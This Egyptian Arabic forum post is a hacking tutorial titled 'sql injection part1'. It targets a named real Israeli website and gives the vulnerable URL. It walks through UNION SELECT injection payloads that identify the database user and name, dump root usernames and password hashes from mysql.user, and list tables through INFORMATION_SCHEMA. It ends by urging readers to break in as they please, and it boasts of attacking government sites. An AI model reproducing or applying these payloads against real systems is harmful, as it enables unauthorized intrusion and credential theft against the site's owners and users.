sql injection part1

[muslim4ever1]

سلام عليكم شباب
المهم نبدأ الموضوع الرخم بتاع انهرده ده علشان الحق اذاكر شويه طبعا انا عامل الموضوع ده فى السريع كده لان المواضيع اللى فاتت كانت كلها اوامر و محدش فهم اى حاجه انا عارف(ما عدا بعض الناس :twisted: ) المهم الموقع الجميل بتاع انهرده ده كان مع واحد اسرائيلى و اتحدانى على انى اخترقو مع انى كنت مطلع فيه كذا ثغره قبل كده و بردو هوا مش مصدق و قعد يزن قولت نرجعلو و نعمل معاه موضوع نوضح بيه شويه حاجات
الموقع هوا http://www.panet.co.il
و الثغره http://www.panet.co.il/ysc.php?ac=all_tickers&cat_id=1
طيب نرجع من الاول خالص بقا علشان الناس تبقا معانا فى الكلام
ازاى نعرف انها ثغره sql انا قريت ان احنا لازم نعمل' و لو طلع ايرور اعمل union select null و نشوف لو عمل ايرور بيقولك ان عدد الاعمده مش مظبوط تبقا ثغره sql
اوك كلامك مظبوط بس تعالى نطبق

اوك كلامك مظبوط طلع ايرور طيب تعالى نعمل union select null علشان نتاكد انو مش خطا برمجى

شوف طلع ايه !!! متخفش لسه عندك فرصه كمان متسبوش برضو اكتب /* يعنى كل الكلام اللى بعدها على انو تعليق علشان مينفذش اوامر فى الاستعلام اللى فى الاسكريبت الاصلى انما كل الكلام بتاعو هيبقا تعليق بعد استعلامك

ايوه كده تمام طلعت ثغره
طيب بعد كده يا عم انا هنعمل ايه
هقولك احنا دلوقتى هنجيب عدد الاعمده بى استخدام null و دى اصلا معناها فراغ اصلا يعنى مش بتأثر على حاجه و حتى لو عملت اى حاجه تانيه هيا هيا مش هتفرق

ايه ده لسه موجوده بردو
اوك عادى ضيف كمان احنا وارنا ايه يعنى

تمام افضل ضيف انت بقا لحد ما تخلص الاييرور خالص و يرجعلك صفحه الموقع تانى زى كده

اوك كده تمام
تعالو نلعب شويه قبل ما نخش فى الجد
دلوقتى عايزين نعرف اسم يوزر الموقع
هيبقا بى الداله يوزر user() و دى متعرفه لوحدها فى mysql يعنى انت مش هتعمل حاجه
انت بس تضيفها فى الاستغلال
زى كده
union select null,null,null,user() /*
زى ما انتو شايفين الزبون بتاعنا هوا الروت دى جامده جدا كده هتشوفو كمان شويه
:twisted:

اوك طيب ما تيجو نشوف اسم القاعده بتاعتنا بدل ما نقعد نخمن و نوجع دمغنا
هتيبقا الاستغلال بى داله database()
union select null,null,null,database() /*

اوك تمام كده طيب دلوقتى
طيب تعالو نخش فى التقيل شويه
فى حاجه بسيطه كده المفروض ان احنا نجربها قبل ما نعمل اى حاجه فى السيرفر و هوا نشوف mysql محمى ولا سايبونى على البحرى :D
طيب و دى هتفيدنا بى ايه !
ققولك انت بدل ما توجع دماغك و تقعد تتطلع باسورد الادمن و ترفع ملفات و تقعد تتدور على لوكل و كلام فاضى من ده بكل بساطه هوا لو مش حامى mysql يبقا انت يا عم معاك الروت بكل سهوله
طيب تعالو نشوف هوا حاميه ولا لا !
union select null,null,null,null from mysql.user /*
ههههههههه العبيط سايبها بحرى
شوفو الصوره ده استعلام mysql.user و رجعلنا الموقع زى ما هوا و بكده تقدر تقول انو مطلعش محمى

لا طيب نكمل معاه بقا و نطلب منو user
union select null,null,user,null from mysql.user /*

تمام جابلك ان اليوزر اسمو root يعنى تمام اوى طيب بالمره نجيب الباسورد
union select null,null,user,password from mysql.user /*

طيب كده الحمد لله بكل سهوله هتاخد الباسورد و هوا تشفير base64 و هيتفك معاك فى ثانيه واحده فى cain اوك بس الطريقه دى شغاله على 10% من السيرفرات و انا مش هستنى يا تنجح يا متنجحش! عايزين طريقه محترمه
طيب نرجع للطريقه العاديه انك تجيب باسورد الادمن
من الاول كده فى ناس كتير كانت بتقول ان الحكايه كلها انك لازم تخمن اسم القاعده و انا كنت من شهر بما انى من المبتدئين فى sql injection كنت هتجنن فعلا لانى كان معايا مواقع حكوميه بالهبل
و مش عارف اخمن اليوزر لحد ما شوفت كام كتاب حلوين جدا مع درس ريموتر كان فيهم الحل
فى حاجه بتجى كده تعتبر قاعده فى الmysql و دى بتخزن فيها كل اسماء القواعد و الاعمده و كل حاجه و عاده مش بتبقا محميه خالص و هتقدر تجيب بيها اسم القواعد و هيا INFORMATION_SCHEMA.TABLES
كويس كده تعالو نستعلم عنها و نشوف هتطلعلنا ايه
union select null,null,table_name,null from INFORMATION_SCHEMA.TABLES /*

زى ما انتو شايفين القواعد اهى و اختراو زى ما انتو عايزين و اخترقو براحتو كفايه كده انهرده و نبقا نعملو part2 بعد الامتحنات يعنى اول شهر 6 بقا و عليكو خير
و اى استفسار انا مش موجود علشان هبقا بذاكر :sad: انما لو عرفت ازوغ شويه من البيت هبقا ارد عليه و لو دخلت لقيت حد مدعليش انتو حرين بقا :wink: سلاموز